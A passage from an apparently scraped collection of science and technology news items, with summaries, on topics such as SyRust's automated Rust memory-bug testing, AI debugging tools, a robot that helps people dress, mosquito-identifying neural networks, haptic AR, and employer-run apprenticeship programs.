are "quality, quality, quality," according to Galil. It takes time for faculty to develop high-quality, engaging online courses, and time was one resource that universities did not have during the almost-overnight, pandemic-forced conversion to online instruction. As a result, reliance on zoomed classes resulted in a drop in student engagement, putting the wrong kind of "distance" in distance education. But Galil believes well-conceived online courses can actually promote student engagement, particularly when accompanied - as they have been at Georgia Tech - with the sprouting of student groups who affiliate through social media. Galil remains bullish on the future of MOOCs and their potential for undergraduate education. "They will provide access to high quality education to a wider student population, unserved by the current system of exclusion and escalating tuition. The idea and role of higher education institutes is to contribute to society through education. As technology provides the means to place higher education within reach of a greater number of people, our colleges and universities can fulfill their mission."
138
Tool Automatically Finds Buffer Overflow Vulnerabilities
"It would take people 244 hours per year to read all of the privacy policies at all of the websites they visit in one year. I study privacy policies, and I spend a lot of time reading them, and I do not spend 244 hours per year reading privacy policies." Lorrie Cranor, director of the CyLab Usable Privacy and Security Lab
A new tool designed to automatically test for memory flaws in the Rust programming language libraries could detect and mitigate the threat of buffer overflow attacks. Crafted by researchers at Carnegie Mellon University's Security and Privacy Institute (CyLab), the SyRust tool can automatically generate unit tests for library application programming interfaces, and check these library deployments for memory bugs. CyLab's Limin Jia said the team used SyRust on 30 popular libraries, unearthing four previously undiscovered vulnerabilities. Jia said the team is attempting to enhance what it calls the "improved courage" of testing to ensure a wider net has been cast and to improve users' confidence that most, if not all, bugs have been identified.
[]
[]
[]
scitechnews
None
None
None
None
A new tool designed to automatically test for memory flaws in the Rust programming language libraries could detect and mitigate the threat of buffer overflow attacks. Crafted by researchers at Carnegie Mellon University's Security and Privacy Institute (CyLab), the SyRust tool can automatically generate unit tests for library application programming interfaces, and check these library deployments for memory bugs. CyLab's Limin Jia said the team used SyRust on 30 popular libraries, unearthing four previously undiscovered vulnerabilities. Jia said the team is attempting to enhance what it calls the "improved courage" of testing to ensure a wider net has been cast and to improve users' confidence that most, if not all, bugs have been identified. "It would take people 244 hours per year to read all of the privacy policies at all of the websites they visit in one year. I study privacy policies, and I spend a lot of time reading them, and I do not spend 244 hours per year reading privacy policies." Lorrie Cranor, director of the CyLab Usable Privacy and Security Lab
139
AI's Role in Debugging Code Expected to Grow
Technology companies are developing artificial intelligence (AI) -based tools to debug code as software maintenance becomes ever more challenging. Intel Labs' Justin Gottschlich said developers find it increasingly difficult to identify bugs in code without machine assistance; debugging consumes about half of developers' time, and correcting a single bug can take weeks. Gottschlich said Intel Labs expects to issue two free AI-based software debugging tools for outside developers by year's end. The ControlFlag tool can automatically detect coding errors via statistical analysis and machine learning, and the Machine Inferred Code Similarity tool can automatically recognize code snippets that execute similar functions.
[]
[]
[]
scitechnews
None
None
None
None
Technology companies are developing artificial intelligence (AI) -based tools to debug code as software maintenance becomes ever more challenging. Intel Labs' Justin Gottschlich said developers find it increasingly difficult to identify bugs in code without machine assistance; debugging consumes about half of developers' time, and correcting a single bug can take weeks. Gottschlich said Intel Labs expects to issue two free AI-based software debugging tools for outside developers by year's end. The ControlFlag tool can automatically detect coding errors via statistical analysis and machine learning, and the Machine Inferred Code Similarity tool can automatically recognize code snippets that execute similar functions.
140
MIT Robot Could Help People with Limited Mobility Dress Themselves
Robots have plenty of potential to help people with limited mobility, including models that could help the infirm put on clothes. That's a particularly challenging task, however, that requires dexterity, safety and speed. Now, scientists at MIT CSAIL have developed an algorithm that strikes a balance by allowing for non-harmful impacts rather than not permitting any impacts at all as before. Humans are hardwired to accommodate and adjust to other humans, but robots have to learn all that from scratch. For example, it's relatively easy for a person to help someone else dress, as we know instinctively where to hold the clothing item, how people can bend their arms, how cloth reacts and more. However, robots have to be programmed with all that information. In the past, algorithms have prevented robots from making any impact with humans at all in the interest of safety. However, that can lead to something called the "freezing robot" problem, where the robot essentially stops moving and can't accomplish the task it set out to do. To get past that issue, an MIT CSAIL team led by PhD student Shen Li developed an algorithm that redefines robotic motion safety by allowing for "safe impacts" on top of collision avoidance. This lets the robot make non-harmful contact with a human to achieve its task, as long as its impact on the human is low. "Developing algorithms to prevent physical harm without unnecessarily impacting the task efficiency is a critical challenge," said Li. "By allowing robots to make non-harmful impact with humans, our method can find efficient robot trajectories to dress the human with a safety guarantee." For a simple dressing task, the system worked even if the person was doing other activities like checking a phone, as shown in the video above. It does that by combining multiple models for different situations, rather than relying on a single model as before. "This multifaceted approach combines set theory, human-aware safety constraints, human motion prediction and feedback control for safe human-robot interaction," said Carnegie Mellon University's Zackory Erickson. The research is still in the early stages, but the ideas could be used areas other than just dressing. "This research could potentially be applied to a wide variety of assistive robotics scenarios, towards the ultimate goal of enabling robots to provide safer physical assistance to people with disabilities," Erickson said.
Researchers at the Massachusetts Institute of Technology have designed an algorithm to help a robot efficiently dress a human, theoretically ensuring human safety by reasoning about the human model's uncertainty. The team declined to use a single default model in which the machine only understands one potential reaction in favor of many possible models, to more closely emulate how a human understands other humans. The robot reduces uncertainty and refines those models by collecting more data. The MIT team also reclassified safety for human-aware motion planners as either collision avoidance or safe impact in case of a collision, so the robot could safely complete the dressing task faster. Carnegie Mellon University's Zackory Erickson said, "This research could potentially be applied to a wide variety of assistive robotics scenarios, towards the ultimate goal of enabling robots to provide safer physical assistance to people with disabilities."
[]
[]
[]
scitechnews
None
None
None
None
Researchers at the Massachusetts Institute of Technology have designed an algorithm to help a robot efficiently dress a human, theoretically ensuring human safety by reasoning about the human model's uncertainty. The team declined to use a single default model in which the machine only understands one potential reaction in favor of many possible models, to more closely emulate how a human understands other humans. The robot reduces uncertainty and refines those models by collecting more data. The MIT team also reclassified safety for human-aware motion planners as either collision avoidance or safe impact in case of a collision, so the robot could safely complete the dressing task faster. Carnegie Mellon University's Zackory Erickson said, "This research could potentially be applied to a wide variety of assistive robotics scenarios, towards the ultimate goal of enabling robots to provide safer physical assistance to people with disabilities." Robots have plenty of potential to help people with limited mobility, including models that could help the infirm put on clothes. That's a particularly challenging task, however, that requires dexterity, safety and speed. Now, scientists at MIT CSAIL have developed an algorithm that strikes a balance by allowing for non-harmful impacts rather than not permitting any impacts at all as before. Humans are hardwired to accommodate and adjust to other humans, but robots have to learn all that from scratch. For example, it's relatively easy for a person to help someone else dress, as we know instinctively where to hold the clothing item, how people can bend their arms, how cloth reacts and more. However, robots have to be programmed with all that information. In the past, algorithms have prevented robots from making any impact with humans at all in the interest of safety. However, that can lead to something called the "freezing robot" problem, where the robot essentially stops moving and can't accomplish the task it set out to do. To get past that issue, an MIT CSAIL team led by PhD student Shen Li developed an algorithm that redefines robotic motion safety by allowing for "safe impacts" on top of collision avoidance. This lets the robot make non-harmful contact with a human to achieve its task, as long as its impact on the human is low. "Developing algorithms to prevent physical harm without unnecessarily impacting the task efficiency is a critical challenge," said Li. "By allowing robots to make non-harmful impact with humans, our method can find efficient robot trajectories to dress the human with a safety guarantee." For a simple dressing task, the system worked even if the person was doing other activities like checking a phone, as shown in the video above. It does that by combining multiple models for different situations, rather than relying on a single model as before. "This multifaceted approach combines set theory, human-aware safety constraints, human motion prediction and feedback control for safe human-robot interaction," said Carnegie Mellon University's Zackory Erickson. The research is still in the early stages, but the ideas could be used areas other than just dressing. "This research could potentially be applied to a wide variety of assistive robotics scenarios, towards the ultimate goal of enabling robots to provide safer physical assistance to people with disabilities," Erickson said.
141
UOC Team Develops Neural Network to Identify Tiger Mosquitoes
A study by researchers in the Scene understanding and artificial intelligence ( SUNAI ) research group, of the Universitat Oberta de Catalunya's (UOC) Faculty of Computer Science, Multimedia and Telecommunications and of the eHealth Center , has developed a method that can learn to identify mosquitoes using a large number of images that volunteers took using mobile phones and uploaded to Mosquito Alert platform. Citizen science to investigate and control disease-transmitting mosquitoes As well as being annoying because of their bites, mosquitoes can be the carriers of pathogens. Rising temperatures worldwide are facilitating their spread. This is the case with the tiger mosquito, Aedes albopictus , and other species in Spain and around the world. As these species spread, the science dedicated to combating the problems associated with them develops. This is how Mosquito Alert was set up, a citizen science project coordinated by the Centre for Research on Ecology and Forestry Applications, the Blanes Centre for Advanced Studies and the Universitat Pompeu Fabra to which UOC researchers have contributed. This project brings together information collected by volunteer citizens, who use their mobile phones to capture mosquito images as well as that of their breeding sites in public spaces. Along with the photo the location of the observation and other necessary information to help in the identification of the species are also collected. This data is then processed by entomologists and other experts to confirm the presence of a potentially disease-carrying species and alert the relevant authorities. In this way, with a simple photo and an app, citizens can help to generate a map of the mosquitoes' distribution all over the world and help to combat them. "Mosquito Alert is a platform set up in 2014 to monitor and control disease-carrying mosquitoes," says Gereziher Adhane, who worked on the study with Mohammad Mahdi Dehshibi and David Masip . "Identifying the mosquitoes is fundamental, as the diseases they transmit continue to be a major public health issue. "The greatest challenge we encountered in identifying the type of mosquito in this study was due to images taken in uncontrolled conditions by citizens ," he comments. He explains, the image was not shot in close-up, and it contains additional objects, which could reduce the performance of the proposed method. Even if the images were taken up close, they were not necessarily at an angle that entomologists could quickly identify, or because the images were taken of killed mosquitos, the mosquito body patterns were deformed. "Entomologists and experts can identify mosquitoes in the laboratory by analysing the spectral wave forms of their wing beats, the DNA of larvae and morphological parts of the body," Adhane points out. "This type of analysis depends largely on human expertise and requires the collaboration of professionals, is typically time-consuming, and is not cost-effective because of the possible rapid propagation of invasive species . Moreover, this way of studying populations of mosquitoes is not easy to adapt to identify large groups with experiments carried out outside the laboratory or with images obtained in uncontrolled conditions," he adds. This is where neural networks can play a role as a practical solution for controlling the spread of mosquitoes. Deep neural networks, cutting-edge technology for identifying mosquitoes Neural networks consist of a complex combination of interconnected neurons . Information is entered at one end of the network and numerous operations are performed until a result is obtained. A feature of neural networks is that they can be trained t hrough supervised, semi-supervised, or unsupervised manner to process data and guide the network about the type of result being sought. Another important characteristic is their ability to process large amounts of data , such as those submitted by volunteers participated in Mosquito Alert project. The neural network can be trained to analyse images, among other data types, and detect small variations that could be difficult for experts to easily perceive. "Manual inspection to identify the disease-carrying mosquitoes is costly, requires a lot of time and is difficult in settings outside the laboratory. Automated systems to identify mosquitoes could help entomologists to monitor the spread of disease vectors with ease," the UOC researcher emphasizes. Conventional machine learning algorithms are not efficient enough for big data analysis like the data available in Mosquito Alert platform, because it contains many details and there is a high degree of similarity between the morphological structures of different mosquito species. However, in the study, the UOC researchers showed that deep neural networks can be used to distinguish between the morphological similarities of different species of mosquito, using the photographs uploaded to the platform. "The neural network we have developed can perform as well or nearly as well as a human expert and the algorithm is sufficiently powerful to process massive amounts of images," says Adhane. How does a deep neural network work? "When a deep neural network receives input data, information patterns are learned through convolution, pooling, and activation layers which ultimately arrive at the output units to perform the classification task," the researcher tells us, describing the complex process hidden behind this model. "For a neural network to learn there has to be some kind of feedback, to reduce the difference between real values and those predicted by the computing operation. The network is trained until the designers determine that its performance is satisfactory . The model we have developed could be used in practical applications with small modifications to work with mobile apps," he explains. Although there is still much development work to do the researcher concludes that "using this trained network it is possible to make predictions about images of mosquitoes taken using smartphones efficiently and in real time, as has happened with the Mosquito Alert project." This UOC research project supports sustainable development goal (SDG) 3: Ensure health and well-being for all, at every stage of life Mosquito Alert is a project coordinated by the CREAF (Centre de Recerca Ecològica i Aplicacions Forestals), UPF (Universitat Pompeu Fabra) ICREA (Institución Catalana de Investigación y Estudios Avanzados) and CEAB-CSIC (Centro de Estudios Avanzados de Blanes). Reference article Adhane, Gereziher, Mohammad Mahdi Dehshibi, and David Masip. 2021. "A Deep Convolutional Neural Network for Classification of Aedes Albopictus Mosquitoes." IEEE Access 9: 72681-90. https://doi.org/10.1109/ACCESS.2021.3079700. UOC R&I The UOC's research and innovation (R&I) is helping overcome pressing challenges faced by global societies in the 21st century, by studying interactions between technology and human & social sciences with a specific focus on the network society , e-learning and e-health . Over 500 researchers and 51 research groups work among the University's seven faculties and two research centres: the Internet Interdisciplinary Institute ( IN3 ) and the eHealth Center ( eHC ). The United Nations' 2030 Agenda for Sustainable Development and open knowledge serve as strategic pillars for the UOC's teaching, research and innovation. More information: research.uoc.edu . #UOC25years
A new technique can learn to identify tiger mosquitoes using a large set of images captured on mobile phones and uploaded to the Mosquito Alert platform by volunteers. Scientists at Spain's Universitat Oberta de Catalunya (UOC) engineered a deep neural network to differentiate between the morphological similarities of diverse mosquito species, and UOC's Gereziher Adhane said the network performs as well or nearly as well as human experts, and can process vast volumes of images. Adhane also said the algorithm, with modest tweaking, could work with mobile applications. Adhane said the neural network can "make predictions about images of mosquitoes taken using smartphones efficiently and in real time, as has happened with the Mosquito Alert project."
[]
[]
[]
scitechnews
None
None
None
None
A new technique can learn to identify tiger mosquitoes using a large set of images captured on mobile phones and uploaded to the Mosquito Alert platform by volunteers. Scientists at Spain's Universitat Oberta de Catalunya (UOC) engineered a deep neural network to differentiate between the morphological similarities of diverse mosquito species, and UOC's Gereziher Adhane said the network performs as well or nearly as well as human experts, and can process vast volumes of images. Adhane also said the algorithm, with modest tweaking, could work with mobile applications. Adhane said the neural network can "make predictions about images of mosquitoes taken using smartphones efficiently and in real time, as has happened with the Mosquito Alert project." A study by researchers in the Scene understanding and artificial intelligence ( SUNAI ) research group, of the Universitat Oberta de Catalunya's (UOC) Faculty of Computer Science, Multimedia and Telecommunications and of the eHealth Center , has developed a method that can learn to identify mosquitoes using a large number of images that volunteers took using mobile phones and uploaded to Mosquito Alert platform. Citizen science to investigate and control disease-transmitting mosquitoes As well as being annoying because of their bites, mosquitoes can be the carriers of pathogens. Rising temperatures worldwide are facilitating their spread. This is the case with the tiger mosquito, Aedes albopictus , and other species in Spain and around the world. As these species spread, the science dedicated to combating the problems associated with them develops. This is how Mosquito Alert was set up, a citizen science project coordinated by the Centre for Research on Ecology and Forestry Applications, the Blanes Centre for Advanced Studies and the Universitat Pompeu Fabra to which UOC researchers have contributed. This project brings together information collected by volunteer citizens, who use their mobile phones to capture mosquito images as well as that of their breeding sites in public spaces. Along with the photo the location of the observation and other necessary information to help in the identification of the species are also collected. This data is then processed by entomologists and other experts to confirm the presence of a potentially disease-carrying species and alert the relevant authorities. In this way, with a simple photo and an app, citizens can help to generate a map of the mosquitoes' distribution all over the world and help to combat them. "Mosquito Alert is a platform set up in 2014 to monitor and control disease-carrying mosquitoes," says Gereziher Adhane, who worked on the study with Mohammad Mahdi Dehshibi and David Masip . "Identifying the mosquitoes is fundamental, as the diseases they transmit continue to be a major public health issue. "The greatest challenge we encountered in identifying the type of mosquito in this study was due to images taken in uncontrolled conditions by citizens ," he comments. He explains, the image was not shot in close-up, and it contains additional objects, which could reduce the performance of the proposed method. Even if the images were taken up close, they were not necessarily at an angle that entomologists could quickly identify, or because the images were taken of killed mosquitos, the mosquito body patterns were deformed. "Entomologists and experts can identify mosquitoes in the laboratory by analysing the spectral wave forms of their wing beats, the DNA of larvae and morphological parts of the body," Adhane points out. "This type of analysis depends largely on human expertise and requires the collaboration of professionals, is typically time-consuming, and is not cost-effective because of the possible rapid propagation of invasive species . Moreover, this way of studying populations of mosquitoes is not easy to adapt to identify large groups with experiments carried out outside the laboratory or with images obtained in uncontrolled conditions," he adds. This is where neural networks can play a role as a practical solution for controlling the spread of mosquitoes. Deep neural networks, cutting-edge technology for identifying mosquitoes Neural networks consist of a complex combination of interconnected neurons . Information is entered at one end of the network and numerous operations are performed until a result is obtained. A feature of neural networks is that they can be trained t hrough supervised, semi-supervised, or unsupervised manner to process data and guide the network about the type of result being sought. Another important characteristic is their ability to process large amounts of data , such as those submitted by volunteers participated in Mosquito Alert project. The neural network can be trained to analyse images, among other data types, and detect small variations that could be difficult for experts to easily perceive. "Manual inspection to identify the disease-carrying mosquitoes is costly, requires a lot of time and is difficult in settings outside the laboratory. Automated systems to identify mosquitoes could help entomologists to monitor the spread of disease vectors with ease," the UOC researcher emphasizes. Conventional machine learning algorithms are not efficient enough for big data analysis like the data available in Mosquito Alert platform, because it contains many details and there is a high degree of similarity between the morphological structures of different mosquito species. However, in the study, the UOC researchers showed that deep neural networks can be used to distinguish between the morphological similarities of different species of mosquito, using the photographs uploaded to the platform. "The neural network we have developed can perform as well or nearly as well as a human expert and the algorithm is sufficiently powerful to process massive amounts of images," says Adhane. How does a deep neural network work? "When a deep neural network receives input data, information patterns are learned through convolution, pooling, and activation layers which ultimately arrive at the output units to perform the classification task," the researcher tells us, describing the complex process hidden behind this model. "For a neural network to learn there has to be some kind of feedback, to reduce the difference between real values and those predicted by the computing operation. The network is trained until the designers determine that its performance is satisfactory . The model we have developed could be used in practical applications with small modifications to work with mobile apps," he explains. Although there is still much development work to do the researcher concludes that "using this trained network it is possible to make predictions about images of mosquitoes taken using smartphones efficiently and in real time, as has happened with the Mosquito Alert project." This UOC research project supports sustainable development goal (SDG) 3: Ensure health and well-being for all, at every stage of life Mosquito Alert is a project coordinated by the CREAF (Centre de Recerca Ecològica i Aplicacions Forestals), UPF (Universitat Pompeu Fabra) ICREA (Institución Catalana de Investigación y Estudios Avanzados) and CEAB-CSIC (Centro de Estudios Avanzados de Blanes). Reference article Adhane, Gereziher, Mohammad Mahdi Dehshibi, and David Masip. 2021. "A Deep Convolutional Neural Network for Classification of Aedes Albopictus Mosquitoes." IEEE Access 9: 72681-90. https://doi.org/10.1109/ACCESS.2021.3079700. UOC R&I The UOC's research and innovation (R&I) is helping overcome pressing challenges faced by global societies in the 21st century, by studying interactions between technology and human & social sciences with a specific focus on the network society , e-learning and e-health . Over 500 researchers and 51 research groups work among the University's seven faculties and two research centres: the Internet Interdisciplinary Institute ( IN3 ) and the eHealth Center ( eHC ). The United Nations' 2030 Agenda for Sustainable Development and open knowledge serve as strategic pillars for the UOC's teaching, research and innovation. More information: research.uoc.edu . #UOC25years
142
AR System Alters Sight, Sound, Touch
There's the typical pitter-patter sound that comes from a person drumming their fingers along a tabletop. But what if this normal pitter-patter sound was perceived as a series of hollow echoes? Or rolling thunder? A new augmented reality system called Tactile Echoes provides users with experiences like this, and could be used for a wide range of gaming, entertainment and research purposes. Notably, the system does not require any equipment between the user's fingertips and the contact surface, meaning users can enjoy the real sensation of their environment along with the visual, haptic and auditory augmented enhancements. "Tactile Echoes is possibly the first programmable system for haptic augmented reality that allows its users to freely touch physical objects or surfaces augmented with multimodal digital feedback using their hands," says Anzu Kawazoe , a PhD candidate at the University of California, Santa Barbara who co-designed Tactile Echoes. It accomplishes this using a sensor that is placed on the top of the user's fingernail, which detects the vibrations that are naturally produced within the finger as it touches a surface. The vibrational signals are processed and translated into programmed sounds. Different tactile feedback and sounds can be played with each interaction, because the vibrational patterns in our fingers change depending on what surface we touch, or the intensity of pressure applied. For example, Tactile Echoes may play a light, fun echo when you tap an object lightly, or play a sudden thud if you jab the object with force. "We were motivated by the idea of being able to almost magically augment any ordinary object or surface, such as a simple wooden table, with lively haptic and effects that playfully respond to how or where we touch," explains Kawazoe. Her team took the system one step further by integrating the wearable device with virtual environments created by a smart projector or a VR or AR headset. In this way, users can "touch" virtual objects in their real environment, and experience enhanced graphic, sound and haptic feedback. The researchers tested Tactile Echoes through a number of user experiments, described in study published May 26 in IEEE Transactions on Haptics . First, study participants were asked to describe different sounds, and what perceptions and associations are evoked with each one. In a second experiment, participants used Tactile Echoes to complete an interactive, augmented reality video game that was projected onto an ordinary desktop surface. Users reported that the Tactile Echoes feedback greatly enhanced the responsiveness, and their level of engagement and agency in playing the game. While Tactile Echoes is still a prototype, Kawazoe says her team is interested in collaborating with companies to commercialize this tech. "Some of the most promising applications we can envisage include augmented reality games that can be played on any table top, musical devices whose interface can be projected wherever needed, and educational systems for enlivening learning by K-12 students," she says. She also notes that her team's research so far with Tactile Echoes has revealed some interesting perceptual phenomena that occur when haptic feedback is delayed through the system. In particular, they believe that perceptual masking is happening, whereby the perception of one stimulus affects the perceived intensity of a second stimulus. "We are thinking that this tactile masking effect is working on the Tactile Echoes system. Specifically, time-delayed tactile feedback is as perceived stronger," explains Kawazoe. "We are preparing new experiments to investigate these effects, and plan to use the results to further improve the Tactile Echoes system."
Researchers at the University of California, Santa Barbara have developed an augmented reality (AR) system that can translate the vibrations produced by fingers touching a surface into programmed sounds. The system, Tactile Echoes, could be used for gaming, entertainment, and research purposes. A sensor placed on a user's fingernail can detect the vibrations produced within the finger as it touches a surface, creating different sounds depending on the surface touched or the pressure applied. Researcher Anzu Kawazoe said, "We were motivated by the idea of being able to almost magically augment any ordinary object or surface, such as a simple wooden table, with lively haptics and effects that playfully respond to how or where we touch." The device can be integrated with smart projectors or virtual reality or AR headsets to allow users to touch virtual objects in their real environment and receive graphic, sound, and haptic feedback.
[]
[]
[]
scitechnews
None
None
None
None
Researchers at the University of California, Santa Barbara have developed an augmented reality (AR) system that can translate the vibrations produced by fingers touching a surface into programmed sounds. The system, Tactile Echoes, could be used for gaming, entertainment, and research purposes. A sensor placed on a user's fingernail can detect the vibrations produced within the finger as it touches a surface, creating different sounds depending on the surface touched or the pressure applied. Researcher Anzu Kawazoe said, "We were motivated by the idea of being able to almost magically augment any ordinary object or surface, such as a simple wooden table, with lively haptics and effects that playfully respond to how or where we touch." The device can be integrated with smart projectors or virtual reality or AR headsets to allow users to touch virtual objects in their real environment and receive graphic, sound, and haptic feedback. There's the typical pitter-patter sound that comes from a person drumming their fingers along a tabletop. But what if this normal pitter-patter sound was perceived as a series of hollow echoes? Or rolling thunder? A new augmented reality system called Tactile Echoes provides users with experiences like this, and could be used for a wide range of gaming, entertainment and research purposes. Notably, the system does not require any equipment between the user's fingertips and the contact surface, meaning users can enjoy the real sensation of their environment along with the visual, haptic and auditory augmented enhancements. "Tactile Echoes is possibly the first programmable system for haptic augmented reality that allows its users to freely touch physical objects or surfaces augmented with multimodal digital feedback using their hands," says Anzu Kawazoe , a PhD candidate at the University of California, Santa Barbara who co-designed Tactile Echoes. It accomplishes this using a sensor that is placed on the top of the user's fingernail, which detects the vibrations that are naturally produced within the finger as it touches a surface. The vibrational signals are processed and translated into programmed sounds. Different tactile feedback and sounds can be played with each interaction, because the vibrational patterns in our fingers change depending on what surface we touch, or the intensity of pressure applied. For example, Tactile Echoes may play a light, fun echo when you tap an object lightly, or play a sudden thud if you jab the object with force. "We were motivated by the idea of being able to almost magically augment any ordinary object or surface, such as a simple wooden table, with lively haptic and effects that playfully respond to how or where we touch," explains Kawazoe. Her team took the system one step further by integrating the wearable device with virtual environments created by a smart projector or a VR or AR headset. In this way, users can "touch" virtual objects in their real environment, and experience enhanced graphic, sound and haptic feedback. The researchers tested Tactile Echoes through a number of user experiments, described in study published May 26 in IEEE Transactions on Haptics . First, study participants were asked to describe different sounds, and what perceptions and associations are evoked with each one. In a second experiment, participants used Tactile Echoes to complete an interactive, augmented reality video game that was projected onto an ordinary desktop surface. Users reported that the Tactile Echoes feedback greatly enhanced the responsiveness, and their level of engagement and agency in playing the game. While Tactile Echoes is still a prototype, Kawazoe says her team is interested in collaborating with companies to commercialize this tech. "Some of the most promising applications we can envisage include augmented reality games that can be played on any table top, musical devices whose interface can be projected wherever needed, and educational systems for enlivening learning by K-12 students," she says. She also notes that her team's research so far with Tactile Echoes has revealed some interesting perceptual phenomena that occur when haptic feedback is delayed through the system. In particular, they believe that perceptual masking is happening, whereby the perception of one stimulus affects the perceived intensity of a second stimulus. "We are thinking that this tactile masking effect is working on the Tactile Echoes system. Specifically, time-delayed tactile feedback is as perceived stronger," explains Kawazoe. "We are preparing new experiments to investigate these effects, and plan to use the results to further improve the Tactile Echoes system."
143
Imaging Technique May Boost Biology, Neuroscience Research
Researchers at Harvard University and the Massachusetts Institute of Technology have developed a computational imaging process that could improve biology and neuroscience research. The new system, De-scattering with Excitation Patterning (DEEP), uses computational imaging to generate high-resolution images 100 to 1,000 times faster than point-scanning multiphoton microscopy or temporal focusing microscopy. DEEP uses near-infrared laser light to penetrate deep into biological tissue, which scatters the light and excites the fluorescent molecules to be imaged, which emit signals to be captured by the microscope. Harvard's Dushan N. Wadduwage said, "This is very important for neuroscientists and other biologists to actually get better statistics, as well as to see what's happening around the area being imaged."
[]
[]
[]
scitechnews
None
None
None
None
Researchers at Harvard University and the Massachusetts Institute of Technology have developed a computational imaging process that could improve biology and neuroscience research. The new system, De-scattering with Excitation Patterning (DEEP), uses computational imaging to generate high-resolution images 100 to 1,000 times faster than point-scanning multiphoton microscopy or temporal focusing microscopy. DEEP uses near-infrared laser light to penetrate deep into biological tissue, which scatters the light and excites the fluorescent molecules to be imaged, which emit signals to be captured by the microscope. Harvard's Dushan N. Wadduwage said, "This is very important for neuroscientists and other biologists to actually get better statistics, as well as to see what's happening around the area being imaged."
144
FAA: Tool Limits Disruptions Caused by Space Operations
The U.S. Federal Aviation Administration (FAA) last week announced it was using new technology that can automatically deliver data about a space vehicle's trajectory to the U.S. air traffic control system almost instantly. The Space Data Integrator tool will largely replace the manual task of sending such information, which could shorten the amount of time required to route airplanes around space operations. The regulator said the technology was first used for last month's launch of SpaceX's Transporter 2 satellite deployment vehicle; it also will be employed for the return of a SpaceX cargo ship from the International Space Station. The FAA's Stephen Dickson said, "With this capability, we will be able to safely reopen the airspace more quickly and reduce the number of aircraft and other airspace users affected by a launch or reentry."
[]
[]
[]
scitechnews
None
None
None
None
The U.S. Federal Aviation Administration (FAA) last week announced it was using new technology that can automatically deliver data about a space vehicle's trajectory to the U.S. air traffic control system almost instantly. The Space Data Integrator tool will largely replace the manual task of sending such information, which could shorten the amount of time required to route airplanes around space operations. The regulator said the technology was first used for last month's launch of SpaceX's Transporter 2 satellite deployment vehicle; it also will be employed for the return of a SpaceX cargo ship from the International Space Station. The FAA's Stephen Dickson said, "With this capability, we will be able to safely reopen the airspace more quickly and reduce the number of aircraft and other airspace users affected by a launch or reentry."
145
Facing Skilled Worker Shortage, U.S. Technology Companies Try to Train Their Own Labor Pools
Arriving in Columbia, Missouri, at 18, Mateusz Haruza saw the University of Missouri as a stepping stone to a career in tech. When the dean's list student came out to his parents, they withdrew their financial support, and Haruza began struggling academically. He dropped out of college and started working at a UPS Store while running up credit card debt and stringing out his college loans. He'd hit "absolute rock bottom." Last year, friends guided Haruza to a fledgling IBM program that pays new workers as they receive classroom instruction and on-the-job training - no college degree needed. That kind of recruiting was a relatively new solution for IBM and other companies that generally require bachelor's degrees for entry-level white-collar workers. Now, strapped for talent, an increasing number of employers are reconsidering degree requirements and adopting training systems more common in blue-collar trades. Haruza, now 27, is six months into IBM's two-year program, and said it's a supportive environment that feels like family. That's a feeling IBM is trying to grow. While claims of low-wage worker shortages have received considerable pushback , there's broad consensus that some sectors of the economy - technology , health care and tech-adjacent businesses such as insurance - face a genuine dearth of qualified talent . Programs like IBM's have been promoted as having so much potential to address this issue that Congress's research arm recommended requiring employers to offer them, or to be taxed to pay for them. While being paid to train is hardly a new idea, it can be effective on multiple levels. Workers find more rewarding careers while employers enjoy a deeper talent pool, said Amy Kardel of CompTIA, an information technology trade association. People hired through the programs also tend to stay on the job longer; such programs can also broaden a company's culture by attracting employees, including workers of color, whose life experiences are outside the high school-to-college career arc common in white-collar workplaces. "Earn-and-learn strategies can open a door for someone into a career quickly," said Kardel, CompTIA's vice president for strategic workforce relationships. Just one in 300 American workers have participated in a formalized on-the-job training program, a rate less than one-tenth of that in much of western Europe . This despite increased attention here to the white-collar version of the kind of apprenticeship models that remain a staple of the unionized building trades. Still, being paid to train is becoming more common in the United States. The U.S. Department of Labor statistics shows a 70 percent increase in paid apprenticeships during the past decade . Aon, a London-based insurance giant, opened its U.S. earn-and-learn program in 2017, launching a 26-student class to its North American headquarters in Chicago. It has since joined with other Chicago businesses and community colleges to bring on more than 1,000 employee trainees around the city, and expanded its program to Aon offices around the country. Aon trainees join a career track - technology or finance, generally - while working with mentors on the job and taking community college classes. They're paid a full-time wage, taking on tasks previously done by recent university or college graduates. This shift to structured training also enables Aon to inject new diversity - in race, in gender and in life experience - into its business. Bridget Gainer, Aon's chief commercial officer, said the company is stronger for it. "Look, we're in the risk business," Gainer said. "Being able to determine risk takes all types of thought." When looking for talent, Aon recruiters had been turning to the Big Ten universities, Gainer said. Overlooked were institutions like the one Gainer sees from her office window: Harold Washington College, one of the City Colleges of Chicago. That's where Juawana Allen found Aon, by way of a flyer in the library advertising the Aon program. Allen had been working as a nanny and in retail while going to school full time. Her aim then was a law degree. A meeting with an Aon recruiter changed her course. "They were looking for people who were eager to learn and hungry for opportunity," said Allen, 23. "I'm extremely ambitious, and this lined up exactly with what I wanted to do." Joining the company's third trainee class, Allen was paid to split her hours between on-the-job training and classroom instruction provided at Harold Washington. The days were long - Allen and others regularly started work at 9 a.m. before heading to classes that wrapped up around 9 p.m. - but Allen made it through, graduating in December 2020. She now works in reinsurance in the company's Dallas office. Allen aspires to be one of the first women of color in a leadership role at Aon. If she succeeds, she will deliver on one of Gainer's hopes: to improve diversity in senior positions. The insurance industry, like most industries , is disproportionately white and male at the management level. "As a business community, we need to do a better job of diversifying our workforce, full stop," Gainer said. "If you don't address it at the entry level, you're abdicating your responsibility to actually make a change." Another set of employers - America's hospitals and clinics - have long relied on women and people of color to fill their ranks. They are chronically short on staff nonetheless. To address that shortfall in Washington, a training organization run by the state's largest hospitals and their biggest labor union provides a tuition assistance program that will pay the way for hospital employees to advance their educations in health-related fields. "We'll pay for their AA, their BA, their MBA, their PhD, the whole nine yards," said Laura Hopkins, executive director at SEIU Healthcare 1199NW Multi-Employer Training and Education Fund. "You don't have to have a dime in your pocket and you can get your education." Seven years ago, Eva Zhang was a waitress at a suburban Seattle sushi restaurant. Today, thanks to the training fund, she's being paid to become a nurse. Raised in Hubei, China, Zhang moved to the United States with her eldest son and then-husband when she was 24. She spent her first decade working in restaurants before deciding she wanted more growth and better benefits, especially for retirement. She enrolled at a small technical school just outside Seattle to become a medical assistant. The program was overwhelming - she was working full time and raising a family - but she graduated in 2015, at a cost of $10,000. Her starting wage - $16 an hour - hardly justified that investment. She was making less than she had at the sushi restaurant, where she continued to work on weekends. But the job qualified her for a no-cost education program run jointly by her employer and her union. Modeled on programs in New York State and elsewhere, the Washington initiative guides workers to courses of study at the 